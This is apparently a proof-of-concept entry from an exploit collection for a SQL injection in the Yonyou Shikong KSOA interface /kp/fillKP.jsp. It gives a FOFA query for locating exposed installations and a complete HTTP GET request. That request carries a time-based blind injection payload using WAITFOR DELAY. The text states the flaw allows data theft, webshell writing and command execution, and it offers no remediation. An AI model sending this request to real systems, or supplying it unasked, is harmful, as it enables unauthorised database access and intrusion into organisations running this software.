POC/wpoc/用友OA/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md

20 lines
588 B
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞
用友时空KSOA接口 `/kp/fillKP.jsp` 接口存在SQL注入漏洞黑客可以利用该漏洞执行任意SQL语句如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
## fofa
```yaml
app="用友-时空KSOA"
```
## poc
```yaml
GET /kp/fillKP.jsp?kp_djbh=1%27+IF(LEN(db_name())>4)+WAITFOR%20DELAY%20%270:0:2%27+--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
```